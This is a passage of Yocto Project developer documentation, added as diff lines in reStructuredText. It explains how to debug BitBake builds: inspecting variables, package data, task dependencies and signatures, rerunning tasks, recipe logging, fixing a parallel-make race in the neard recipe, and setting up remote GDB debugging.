+values that were later overridden. This description also includes
+variable flags (varflags) set on the variable. The output can be very
+helpful during debugging.
+
+Variables that are exported to the environment are preceded by
+``export`` in the output of ``bitbake -e``. See the following example:
+::
+
+   export CC="i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/ulf/poky/build/tmp/sysroots/qemux86"
+
+In addition to variable values, the output of the ``bitbake -e`` and
+``bitbake -e`` recipe commands includes the following information:
+
+-  The output starts with a tree listing all configuration files and
+   classes included globally, recursively listing the files they include
+   or inherit in turn. Much of the behavior of the OpenEmbedded build
+   system (including the behavior of the :ref:`ref-manual/ref-tasks:normal recipe build tasks`) is
+   implemented in the
+   :ref:`base <ref-classes-base>` class and the
+   classes it inherits, rather than being built into BitBake itself.
+
+-  After the variable values, all functions appear in the output. For
+   shell functions, variables referenced within the function body are
+   expanded. If a function has been modified using overrides or using
+   override-style operators like ``_append`` and ``_prepend``, then the
+   final assembled function body appears in the output.
+
+Viewing Package Information with ``oe-pkgdata-util``
+----------------------------------------------------
+
+You can use the ``oe-pkgdata-util`` command-line utility to query
+:term:`PKGDATA_DIR` and display
+various package-related information. When you use the utility, you must
+use it to view information on packages that have already been built.
+
+Following are a few of the available ``oe-pkgdata-util`` subcommands.
+
+.. note::
+
+   You can use the standard \* and ? globbing wildcards as part of
+   package names and paths.
+
+-  ``oe-pkgdata-util list-pkgs [pattern]``: Lists all packages
+   that have been built, optionally limiting the match to packages that
+   match pattern.
+
+-  ``oe-pkgdata-util list-pkg-files package ...``: Lists the
+   files and directories contained in the given packages.
+
+   .. note::
+
+      A different way to view the contents of a package is to look at
+      the
+      ``${``\ :term:`WORKDIR`\ ``}/packages-split``
+      directory of the recipe that generates the package. This directory
+      is created by the
+      :ref:`ref-tasks-package` task
+      and has one subdirectory for each package the recipe generates,
+      which contains the files stored in that package.
+
+      If you want to inspect the ``${WORKDIR}/packages-split``
+      directory, make sure that
+      :ref:`rm_work <ref-classes-rm-work>` is not
+      enabled when you build the recipe.
+
+-  ``oe-pkgdata-util find-path path ...``: Lists the names of
+   the packages that contain the given paths. For example, the following
+   tells us that ``/usr/share/man/man1/make.1`` is contained in the
+   ``make-doc`` package:
+   ::
+
+      $ oe-pkgdata-util find-path /usr/share/man/man1/make.1
+      make-doc: /usr/share/man/man1/make.1
+
+-  ``oe-pkgdata-util lookup-recipe package ...``: Lists the name
+   of the recipes that produce the given packages.
+
+For more information on the ``oe-pkgdata-util`` command, use the help
+facility:
+::
+
+   $ oe-pkgdata-util --help
+   $ oe-pkgdata-util subcommand --help
+
+.. _dev-viewing-dependencies-between-recipes-and-tasks:
+
+Viewing Dependencies Between Recipes and Tasks
+----------------------------------------------
+
+Sometimes it can be hard to see why BitBake wants to build other recipes
+before the one you have specified. Dependency information can help you
+understand why a recipe is built.
+
+To generate dependency information for a recipe, run the following
+command:
+::
+
+   $ bitbake -g recipename
+
+This command writes the following files in the current directory:
+
+-  ``pn-buildlist``: A list of recipes/targets involved in building
+   `recipename`. "Involved" here means that at least one task from the
+   recipe needs to run when building `recipename` from scratch. Targets
+   that are in
+   :term:`ASSUME_PROVIDED`
+   are not listed.
+
+-  ``task-depends.dot``: A graph showing dependencies between tasks.
+
+The graphs are in
+`DOT <https://en.wikipedia.org/wiki/DOT_%28graph_description_language%29>`__
+format and can be converted to images (e.g. using the ``dot`` tool from
+`Graphviz <https://www.graphviz.org/>`__).
+
+.. note::
+
+   -  DOT files use a plain text format. The graphs generated using the
+      ``bitbake -g`` command are often so large as to be difficult to
+      read without special pruning (e.g. with Bitbake's ``-I`` option)
+      and processing. Despite the form and size of the graphs, the
+      corresponding ``.dot`` files can still be possible to read and
+      provide useful information.
+
+      As an example, the ``task-depends.dot`` file contains lines such
+      as the following:
+      ::
+
+         "libxslt.do_configure" -> "libxml2.do_populate_sysroot"
+
+      The above example line reveals that the
+      :ref:`ref-tasks-configure`
+      task in ``libxslt`` depends on the
+      :ref:`ref-tasks-populate_sysroot`
+      task in ``libxml2``, which is a normal
+      :term:`DEPENDS` dependency
+      between the two recipes.
+
+   -  For an example of how ``.dot`` files can be processed, see the
+      ``scripts/contrib/graph-tool`` Python script, which finds and
+      displays paths between graph nodes.
+
+You can use a different method to view dependency information by using
+the following command:
+::
+
+   $ bitbake -g -u taskexp recipename
+
+This command
+displays a GUI window from which you can view build-time and runtime
+dependencies for the recipes involved in building recipename.
+
+.. _dev-viewing-task-variable-dependencies:
+
+Viewing Task Variable Dependencies
+----------------------------------
+
+As mentioned in the
+":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)`" section of the BitBake
+User Manual, BitBake tries to automatically determine what variables a
+task depends on so that it can rerun the task if any values of the
+variables change. This determination is usually reliable. However, if
+you do things like construct variable names at runtime, then you might
+have to manually declare dependencies on those variables using
+``vardeps`` as described in the
+":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags`" section of the BitBake
+User Manual.
+
+If you are unsure whether a variable dependency is being picked up
+automatically for a given task, you can list the variable dependencies
+BitBake has determined by doing the following:
+
+1. Build the recipe containing the task:
+::
+
+   $ bitbake recipename
+
+2. Inside the :term:`STAMPS_DIR`
+   directory, find the signature data (``sigdata``) file that
+   corresponds to the task. The ``sigdata`` files contain a pickled
+   Python database of all the metadata that went into creating the input
+   checksum for the task. As an example, for the
+   :ref:`ref-tasks-fetch` task of the
+   ``db`` recipe, the ``sigdata`` file might be found in the following
+   location:
+   ::
+
+      ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
+
+   For tasks that are accelerated through the shared state
+   (:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`) cache, an
+   additional ``siginfo`` file is written into
+   :term:`SSTATE_DIR` along with
+   the cached task output. The ``siginfo`` files contain exactly the
+   same information as ``sigdata`` files.
+
+3. Run ``bitbake-dumpsig`` on the ``sigdata`` or ``siginfo`` file. Here
+   is an example:
+   ::
+
+      $ bitbake-dumpsig ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
+
+   In the output of the above command, you will find a line like the
+   following, which lists all the (inferred) variable dependencies for
+   the task. This list also includes indirect dependencies from
+   variables depending on other variables, recursively.
+   ::
+
+      Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[md5sum]', 'SRC_URI[sha256sum]', 'base_do_fetch']
+
+   .. note::
+
+      Functions (e.g. ``base_do_fetch``) also count as variable dependencies.
+      These functions in turn depend on the variables they reference.
+
+   The output of ``bitbake-dumpsig`` also includes the value each
+   variable had, a list of dependencies for each variable, and
+   :term:`bitbake:BB_HASHBASE_WHITELIST`
+   information.
+
+There is also a ``bitbake-diffsigs`` command for comparing two
+``siginfo`` or ``sigdata`` files. This command can be helpful when
+trying to figure out what changed between two versions of a task. If you
+call ``bitbake-diffsigs`` with just one file, the command behaves like
+``bitbake-dumpsig``.
+
+You can also use BitBake to dump out the signature construction
+information without executing tasks by using either of the following
+BitBake command-line options:
+::
+
+   ��dump-signatures=SIGNATURE_HANDLER
+   -S SIGNATURE_HANDLER
+
+
+.. note::
+
+   Two common values for `SIGNATURE_HANDLER` are "none" and "printdiff", which
+   dump only the signature or compare the dumped signature with the cached one,
+   respectively.
+
+Using BitBake with either of these options causes BitBake to dump out
+``sigdata`` files in the ``stamps`` directory for every task it would
+have executed instead of building the specified target package.
+
+.. _dev-viewing-metadata-used-to-create-the-input-signature-of-a-shared-state-task:
+
+Viewing Metadata Used to Create the Input Signature of a Shared State Task
+--------------------------------------------------------------------------
+
+Seeing what metadata went into creating the input signature of a shared
+state (sstate) task can be a useful debugging aid. This information is
+available in signature information (``siginfo``) files in
+:term:`SSTATE_DIR`. For
+information on how to view and interpret information in ``siginfo``
+files, see the "`Viewing Task Variable
+Dependencies <#dev-viewing-task-variable-dependencies>`__" section.
+
+For conceptual information on shared state, see the
+":ref:`overview-manual/overview-manual-concepts:shared state`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _dev-invalidating-shared-state-to-force-a-task-to-run:
+
+Invalidating Shared State to Force a Task to Run
+------------------------------------------------
+
+The OpenEmbedded build system uses
+:ref:`checksums <overview-checksums>` and
+:ref:`overview-manual/overview-manual-concepts:shared state` cache to avoid unnecessarily
+rebuilding tasks. Collectively, this scheme is known as "shared state
+code".
+
+As with all schemes, this one has some drawbacks. It is possible that
+you could make implicit changes to your code that the checksum
+calculations do not take into account. These implicit changes affect a
+task's output but do not trigger the shared state code into rebuilding a
+recipe. Consider an example during which a tool changes its output.
+Assume that the output of ``rpmdeps`` changes. The result of the change
+should be that all the ``package`` and ``package_write_rpm`` shared
+state cache items become invalid. However, because the change to the
+output is external to the code and therefore implicit, the associated
+shared state cache items do not become invalidated. In this case, the
+build process uses the cached items rather than running the task again.
+Obviously, these types of implicit changes can cause problems.
+
+To avoid these problems during the build, you need to understand the
+effects of any changes you make. Realize that changes you make directly
+to a function are automatically factored into the checksum calculation.
+Thus, these explicit changes invalidate the associated area of shared
+state cache. However, you need to be aware of any implicit changes that
+are not obvious changes to the code and could affect the output of a
+given task.
+
+When you identify an implicit change, you can easily take steps to
+invalidate the cache and force the tasks to run. The steps you can take
+are as simple as changing a function's comments in the source code. For
+example, to invalidate package shared state files, change the comment
+statements of
+:ref:`ref-tasks-package` or the
+comments of one of the functions it calls. Even though the change is
+purely cosmetic, it causes the checksum to be recalculated and forces
+the build system to run the task again.
+
+.. note::
+
+   For an example of a commit that makes a cosmetic change to invalidate
+   shared state, see this
+   :yocto_git:`commit </cgit.cgi/poky/commit/meta/classes/package.bbclass?id=737f8bbb4f27b4837047cb9b4fbfe01dfde36d54>`.
+
+.. _dev-debugging-taskrunning:
+
+Running Specific Tasks
+----------------------
+
+Any given recipe consists of a set of tasks. The standard BitBake
+behavior in most cases is: ``do_fetch``, ``do_unpack``, ``do_patch``,
+``do_configure``, ``do_compile``, ``do_install``, ``do_package``,
+``do_package_write_*``, and ``do_build``. The default task is
+``do_build`` and any tasks on which it depends build first. Some tasks,
+such as ``do_devshell``, are not part of the default build chain. If you
+wish to run a task that is not part of the default build chain, you can
+use the ``-c`` option in BitBake. Here is an example:
+::
+
+   $ bitbake matchbox-desktop -c devshell
+
+The ``-c`` option respects task dependencies, which means that all other
+tasks (including tasks from other recipes) that the specified task
+depends on will be run before the task. Even when you manually specify a
+task to run with ``-c``, BitBake will only run the task if it considers
+it "out of date". See the
+":ref:`overview-manual/overview-manual-concepts:stamp files and the rerunning of tasks`"
+section in the Yocto Project Overview and Concepts Manual for how
+BitBake determines whether a task is "out of date".
+
+If you want to force an up-to-date task to be rerun (e.g. because you
+made manual modifications to the recipe's
+:term:`WORKDIR` that you want to try
+out), then you can use the ``-f`` option.
+
+.. note::
+
+   The reason ``-f`` is never required when running the
+   :ref:`ref-tasks-devshell` task is because the
+   [\ :ref:`nostamp <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ]
+   variable flag is already set for the task.
+
+The following example shows one way you can use the ``-f`` option:
+::
+
+   $ bitbake matchbox-desktop
+             .
+             .
+   make some changes to the source code in the work directory
+             .
+             .
+   $ bitbake matchbox-desktop -c compile -f
+   $ bitbake matchbox-desktop
+
+This sequence first builds and then recompiles ``matchbox-desktop``. The
+last command reruns all tasks (basically the packaging tasks) after the
+compile. BitBake recognizes that the ``do_compile`` task was rerun and
+therefore understands that the other tasks also need to be run again.
+
+Another, shorter way to rerun a task and all
+:ref:`ref-manual/ref-tasks:normal recipe build tasks`
+that depend on it is to use the ``-C`` option.
+
+.. note::
+
+   This option is upper-cased and is separate from the ``-c``
+   option, which is lower-cased.
+
+Using this option invalidates the given task and then runs the
+:ref:`ref-tasks-build` task, which is
+the default task if no task is given, and the tasks on which it depends.
+You could replace the final two commands in the previous example with
+the following single command:
+::
+
+   $ bitbake matchbox-desktop -C compile
+
+Internally, the ``-f`` and ``-C`` options work by tainting (modifying)
+the input checksum of the specified task. This tainting indirectly
+causes the task and its dependent tasks to be rerun through the normal
+task dependency mechanisms.
+
+.. note::
+
+   BitBake explicitly keeps track of which tasks have been tainted in
+   this fashion, and will print warnings such as the following for
+   builds involving such tasks:
+
+   .. code-block:: none
+
+      WARNING: /home/ulf/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.1.bb.do_compile is tainted from a forced run
+
+
+   The purpose of the warning is to let you know that the work directory
+   and build output might not be in the clean state they would be in for
+   a "normal" build, depending on what actions you took. To get rid of
+   such warnings, you can remove the work directory and rebuild the
+   recipe, as follows:
+   ::
+
+      $ bitbake matchbox-desktop -c clean
+      $ bitbake matchbox-desktop
+
+
+You can view a list of tasks in a given package by running the
+``do_listtasks`` task as follows:
+::
+
+   $ bitbake matchbox-desktop -c listtasks
+
+The results appear as output to the console and are also in
+the file ``${WORKDIR}/temp/log.do_listtasks``.
+
+.. _dev-debugging-bitbake:
+
+General BitBake Problems
+------------------------
+
+You can see debug output from BitBake by using the ``-D`` option. The
+debug output gives more information about what BitBake is doing and the
+reason behind it. Each ``-D`` option you use increases the logging
+level. The most common usage is ``-DDD``.
+
+The output from ``bitbake -DDD -v targetname`` can reveal why BitBake
+chose a certain version of a package or why BitBake picked a certain
+provider. This command could also help you in a situation where you
+think BitBake did something unexpected.
+
+.. _dev-debugging-buildfile:
+
+Building with No Dependencies
+-----------------------------
+
+To build a specific recipe (``.bb`` file), you can use the following
+command form:
+::
+
+   $ bitbake -b somepath/somerecipe.bb
+
+This command form does
+not check for dependencies. Consequently, you should use it only when
+you know existing dependencies have been met.
+
+.. note::
+
+   You can also specify fragments of the filename. In this case, BitBake
+   checks for a unique match.
+
+Recipe Logging Mechanisms
+-------------------------
+
+The Yocto Project provides several logging functions for producing
+debugging output and reporting errors and warnings. For Python
+functions, the following logging functions exist. All of these functions
+log to ``${T}/log.do_``\ `task`, and can also log to standard output
+(stdout) with the right settings:
+
+-  ``bb.plain(msg)``: Writes msg as is to the log while also
+   logging to stdout.
+
+-  ``bb.note(msg)``: Writes "NOTE: msg" to the log. Also logs to
+   stdout if BitBake is called with "-v".
+
+-  ``bb.debug(level, msg)``: Writes "DEBUG: msg" to the
+   log. Also logs to stdout if the log level is greater than or equal to
+   level. See the ":ref:`-D <bitbake:bitbake-user-manual/bitbake-user-manual-intro:usage and syntax>`" option
+   in the BitBake User Manual for more information.
+
+-  ``bb.warn(msg)``: Writes "WARNING: msg" to the log while also
+   logging to stdout.
+
+-  ``bb.error(msg)``: Writes "ERROR: msg" to the log while also
+   logging to standard out (stdout).
+
+   .. note::
+
+      Calling this function does not cause the task to fail.
+
+-  ``bb.fatal(``\ msg\ ``)``: This logging function is similar to
+   ``bb.error(``\ msg\ ``)`` but also causes the calling task to fail.
+
+   .. note::
+
+      ``bb.fatal()`` raises an exception, which means you do not need to put a
+      "return" statement after the function.
+
+The same logging functions are also available in shell functions, under
+the names ``bbplain``, ``bbnote``, ``bbdebug``, ``bbwarn``, ``bberror``,
+and ``bbfatal``. The
+:ref:`logging <ref-classes-logging>` class
+implements these functions. See that class in the ``meta/classes``
+folder of the :term:`Source Directory` for information.
+
+Logging With Python
+~~~~~~~~~~~~~~~~~~~
+
+When creating recipes using Python and inserting code that handles build
+logs, keep in mind the goal is to have informative logs while keeping
+the console as "silent" as possible. Also, if you want status messages
+in the log, use the "debug" loglevel.
+
+Following is an example written in Python. The code handles logging for
+a function that determines the number of tasks needed to be run. See the
+":ref:`ref-tasks-listtasks`"
+section for additional information:
+::
+
+   python do_listtasks() {
+       bb.debug(2, "Starting to figure out the task list")
+       if noteworthy_condition:
+           bb.note("There are 47 tasks to run")
+       bb.debug(2, "Got to point xyz")
+       if warning_trigger:
+           bb.warn("Detected warning_trigger, this might be a problem later.")
+       if recoverable_error:
+           bb.error("Hit recoverable_error, you really need to fix this!")
+       if fatal_error:
+           bb.fatal("fatal_error detected, unable to print the task list")
+       bb.plain("The tasks present are abc")
+       bb.debug(2, "Finished figuring out the tasklist")
+   }
+
+Logging With Bash
+~~~~~~~~~~~~~~~~~
+
+When creating recipes using Bash and inserting code that handles build
+logs, you have the same goals - informative with minimal console output.
+The syntax you use for recipes written in Bash is similar to that of
+recipes written in Python described in the previous section.
+
+Following is an example written in Bash. The code logs the progress of
+the ``do_my_function`` function.
+::
+
+   do_my_function() {
+       bbdebug 2 "Running do_my_function"
+       if [ exceptional_condition ]; then
+           bbnote "Hit exceptional_condition"
+       fi
+       bbdebug 2  "Got to point xyz"
+       if [ warning_trigger ]; then
+           bbwarn "Detected warning_trigger, this might cause a problem later."
+       fi
+       if [ recoverable_error ]; then
+           bberror "Hit recoverable_error, correcting"
+       fi
+       if [ fatal_error ]; then
+           bbfatal "fatal_error detected"
+       fi
+       bbdebug 2 "Completed do_my_function"
+   }
+
+
+Debugging Parallel Make Races
+-----------------------------
+
+A parallel ``make`` race occurs when the build consists of several parts
+that are run simultaneously and a situation occurs when the output or
+result of one part is not ready for use with a different part of the
+build that depends on that output. Parallel make races are annoying and
+can sometimes be difficult to reproduce and fix. However, some simple
+tips and tricks exist that can help you debug and fix them. This section
+presents a real-world example of an error encountered on the Yocto
+Project autobuilder and the process used to fix it.
+
+.. note::
+
+   If you cannot properly fix a ``make`` race condition, you can work around it
+   by clearing either the :term:`PARALLEL_MAKE` or :term:`PARALLEL_MAKEINST`
+   variables.
+
+The Failure
+~~~~~~~~~~~
+
+For this example, assume that you are building an image that depends on
+the "neard" package. And, during the build, BitBake runs into problems
+and creates the following output.
+
+.. note::
+
+   This example log file has longer lines artificially broken to make
+   the listing easier to read.
+
+If you examine the output or the log file, you see the failure during
+``make``:
+
+.. code-block:: none
+
+   | DEBUG: SITE files ['endian-little', 'bit-32', 'ix86-common', 'common-linux', 'common-glibc', 'i586-linux', 'common']
+   | DEBUG: Executing shell function do_compile
+   | NOTE: make -j 16
+   | make --no-print-directory all-am
+   | /bin/mkdir -p include/near
+   | /bin/mkdir -p include/near
+   | /bin/mkdir -p include/near
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/types.h include/near/types.h
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/log.h include/near/log.h
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/plugin.h include/near/plugin.h
+   | /bin/mkdir -p include/near
+   | /bin/mkdir -p include/near
+   | /bin/mkdir -p include/near
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/tag.h include/near/tag.h
+   | /bin/mkdir -p include/near
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/adapter.h include/near/adapter.h
+   | /bin/mkdir -p include/near
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/ndef.h include/near/ndef.h
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/tlv.h include/near/tlv.h
+   | /bin/mkdir -p include/near
+   | /bin/mkdir -p include/near
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/setting.h include/near/setting.h
+   | /bin/mkdir -p include/near
+   | /bin/mkdir -p include/near
+   | /bin/mkdir -p include/near
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/device.h include/near/device.h
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/nfc_copy.h include/near/nfc_copy.h
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/snep.h include/near/snep.h
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/version.h include/near/version.h
+   | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+     0.14-r0/neard-0.14/include/dbus.h include/near/dbus.h
+   | ./src/genbuiltin nfctype1 nfctype2 nfctype3 nfctype4 p2p > src/builtin.h
+   | i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/
+     build/build/tmp/sysroots/qemux86 -DHAVE_CONFIG_H -I. -I./include -I./src -I./gdbus  -I/home/pokybuild/
+     yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/glib-2.0
+     -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/
+     lib/glib-2.0/include  -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/
+     tmp/sysroots/qemux86/usr/include/dbus-1.0 -I/home/pokybuild/yocto-autobuilder/yocto-slave/
+     nightly-x86/build/build/tmp/sysroots/qemux86/usr/lib/dbus-1.0/include  -I/home/pokybuild/yocto-autobuilder/
+     yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/libnl3
+     -DNEAR_PLUGIN_BUILTIN -DPLUGINDIR=\""/usr/lib/near/plugins"\"
+     -DCONFIGDIR=\""/etc/neard\"" -O2 -pipe -g -feliminate-unused-debug-types -c
+     -o tools/snep-send.o tools/snep-send.c
+   | In file included from tools/snep-send.c:16:0:
+   | tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
+   |  #include <near/dbus.h>
+   |                        ^
+   | compilation terminated.
+   | make[1]: *** [tools/snep-send.o] Error 1
+   | make[1]: *** Waiting for unfinished jobs....
+   | make: *** [all] Error 2
+   | ERROR: oe_runmake failed
+
+Reproducing the Error
+~~~~~~~~~~~~~~~~~~~~~
+
+Because race conditions are intermittent, they do not manifest
+themselves every time you do the build. In fact, most times the build
+will complete without problems even though the potential race condition
+exists. Thus, once the error surfaces, you need a way to reproduce it.
+
+In this example, compiling the "neard" package is causing the problem.
+So the first thing to do is build "neard" locally. Before you start the
+build, set the
+:term:`PARALLEL_MAKE` variable
+in your ``local.conf`` file to a high number (e.g. "-j 20"). Using a
+high value for ``PARALLEL_MAKE`` increases the chances of the race
+condition showing up:
+::
+
+   $ bitbake neard
+
+Once the local build for "neard" completes, start a ``devshell`` build:
+::
+
+   $ bitbake neard -c devshell
+
+For information on how to use a
+``devshell``, see the "`Using a Development
+Shell <#platdev-appdev-devshell>`__" section.
+
+In the ``devshell``, do the following:
+::
+
+   $ make clean
+   $ make tools/snep-send.o
+
+The ``devshell`` commands cause the failure to clearly
+be visible. In this case, a missing dependency exists for the "neard"
+Makefile target. Here is some abbreviated, sample output with the
+missing dependency clearly visible at the end:
+::
+
+   i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/home/scott-lenovo/......
+      .
+      .
+      .
+   tools/snep-send.c
+   In file included from tools/snep-send.c:16:0:
+   tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
+    #include <near/dbus.h>
+                     ^
+   compilation terminated.
+   make: *** [tools/snep-send.o] Error 1
+   $
+
+
+Creating a Patch for the Fix
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Because there is a missing dependency for the Makefile target, you need
+to patch the ``Makefile.am`` file, which is generated from
+``Makefile.in``. You can use Quilt to create the patch:
+::
+
+   $ quilt new parallelmake.patch
+   Patch patches/parallelmake.patch is now on top
+   $ quilt add Makefile.am
+   File Makefile.am added to patch patches/parallelmake.patch
+
+For more information on using Quilt, see the
+"`Using Quilt in Your Workflow <#using-a-quilt-workflow>`__" section.
+
+At this point you need to make the edits to ``Makefile.am`` to add the
+missing dependency. For our example, you have to add the following line
+to the file:
+::
+
+   tools/snep-send.$(OBJEXT): include/near/dbus.h
+
+Once you have edited the file, use the ``refresh`` command to create the
+patch:
+::
+
+   $ quilt refresh
+   Refreshed patch patches/parallelmake.patch
+
+Once
+the patch file exists, you need to add it back to the originating recipe
+folder. Here is an example assuming a top-level
+:term:`Source Directory` named ``poky``:
+::
+
+   $ cp patches/parallelmake.patch poky/meta/recipes-connectivity/neard/neard
+
+The final thing you need to do to implement the fix in the build is to
+update the "neard" recipe (i.e. ``neard-0.14.bb``) so that the
+:term:`SRC_URI` statement includes
+the patch file. The recipe file is in the folder above the patch. Here
+is what the edited ``SRC_URI`` statement would look like:
+::
+
+   SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BPN}-${PV}.tar.xz \
+              file://neard.in \
+              file://neard.service.in \
+              file://parallelmake.patch \
+             "
+
+With the patch complete and moved to the correct folder and the
+``SRC_URI`` statement updated, you can exit the ``devshell``:
+::
+
+   $ exit
+
+Testing the Build
+~~~~~~~~~~~~~~~~~
+
+With everything in place, you can get back to trying the build again
+locally:
+::
+
+   $ bitbake neard
+
+This build should succeed.
+
+Now you can open up a ``devshell`` again and repeat the clean and make
+operations as follows:
+::
+
+   $ bitbake neard -c devshell
+   $ make clean
+   $ make tools/snep-send.o
+
+The build should work without issue.
+
+As with all solved problems, if they originated upstream, you need to
+submit the fix for the recipe in OE-Core and upstream so that the
+problem is taken care of at its source. See the "`Submitting a Change to
+the Yocto Project <#how-to-submit-a-change>`__" section for more
+information.
+
+.. _platdev-gdb-remotedebug:
+
+Debugging With the GNU Project Debugger (GDB) Remotely
+------------------------------------------------------
+
+GDB allows you to examine running programs, which in turn helps you to
+understand and fix problems. It also allows you to perform post-mortem
+style analysis of program crashes. GDB is available as a package within
+the Yocto Project and is installed in SDK images by default. See the
+":ref:`ref-manual/ref-images:Images`" chapter in the Yocto
+Project Reference Manual for a description of these images. You can find
+information on GDB at https://sourceware.org/gdb/.
+
+.. note::
+
+   For best results, install debug (``-dbg``) packages for the applications you
+   are going to debug. Doing so makes extra debug symbols available that give
+   you more meaningful output.
+
+Sometimes, due to memory or disk space constraints, it is not possible
+to use GDB directly on the remote target to debug applications. These
+constraints arise because GDB needs to load the debugging information
+and the binaries of the process being debugged. Additionally, GDB needs
+to perform many computations to locate information such as function
+names, variable names and values, stack traces and so forth - even
+before starting the debugging process. These extra computations place
+more load on the target system and can alter the characteristics of the
+program being debugged.
+
+To help get past the previously mentioned constraints, you can use
+gdbserver, which runs on the remote target and does not load any
+debugging information from the debugged process. Instead, a GDB instance
+processes the debugging information that is run on a remote computer -
+the host GDB. The host GDB then sends control commands to gdbserver to
+make it stop or start the debugged program, as well as read or write
+memory regions of that debugged program. All the debugging information
+loaded and processed as well as all the heavy debugging is done by the
+host GDB. Offloading these processes gives the gdbserver running on the
+target a chance to remain small and fast.
+
+Because the host GDB is responsible for loading the debugging
+information and for doing the necessary processing to make actual
+debugging happen, you have to make sure the host can access the
+unstripped binaries complete with their debugging information and also
+be sure the target is compiled with no optimizations. The host GDB must
+also have local access to all the libraries used by the debugged
+program. Because gdbserver does not need any local debugging
+information, the binaries on the remote target can remain stripped.
+However, the binaries must also be compiled without optimization so they
+match the host's binaries.
+
+To remain consistent with GDB documentation and terminology, the binary
+being debugged on the remote target machine is referred to as the
+"inferior" binary. For documentation on GDB see the `GDB
+site <https://sourceware.org/gdb/documentation/>`__.
+
+The following steps show you how to debug using the GNU project
+debugger.
+
+1. *Configure your build system to construct the companion debug
+   filesystem:*
+
+   In your ``local.conf`` file, set the following:
+   ::
+
+      IMAGE_GEN_DEBUGFS = "1"
+      IMAGE_FSTYPES_DEBUGFS = "tar.bz2"
+
+   These options cause the
+   OpenEmbedded build system to generate a special companion filesystem
+   fragment, which contains the matching source and debug symbols to
+   your deployable filesystem. The build system does this by looking at
+   what is in the deployed filesystem, and pulling the corresponding
+   ``-dbg`` packages.
+
+   The companion debug filesystem is not a complete filesystem, but only
+   contains the debug fragments. This filesystem must be combined with
+   the full filesystem for debugging. Subsequent steps in this procedure
+   show how to combine the partial filesystem with the full filesystem.
+
+2. *Configure the system to include gdbserver in the target filesystem:*
+
+   Make the following addition in either your ``local.conf`` file or in
+   an image recipe:
+   ::
+
+      IMAGE_INSTALL_append = " gdbserver"
+
+   The change makes
+   sure the ``gdbserver`` package is included.
+
+3. *Build the environment:*
+
+   Use the following command to construct the image and the companion
+   Debug Filesystem:
+   ::
+
+      $ bitbake image
+
+   Build the cross GDB component and
+   make it available for debugging. Build the SDK that matches the
+   image. Building the SDK is best for a production build that can be
+   used later for debugging, especially during long term maintenance:
+   ::
+
+      $ bitbake -c populate_sdk image
+
+   Alternatively, you can build the minimal toolchain components that
+   match the target. Doing so creates a smaller than typical SDK and
+   only contains a minimal set of components with which to build simple
+   test applications, as well as run the debugger:
+   ::
+
+      $ bitbake meta-toolchain
+
+   A final method is to build Gdb itself within the build system:
+   ::
+
+      $ bitbake gdb-cross-<architecture>
+
+   Doing so produces a temporary copy of
+   ``cross-gdb`` you can use for debugging during development. While
+   this is the quickest approach, the two previous methods in this step
+   are better when considering long-term maintenance strategies.
+
+   .. note::
+
+      If you run ``bitbake gdb-cross``, the OpenEmbedded build system suggests
+      the actual image (e.g. ``gdb-cross-i586``). The suggestion is usually the
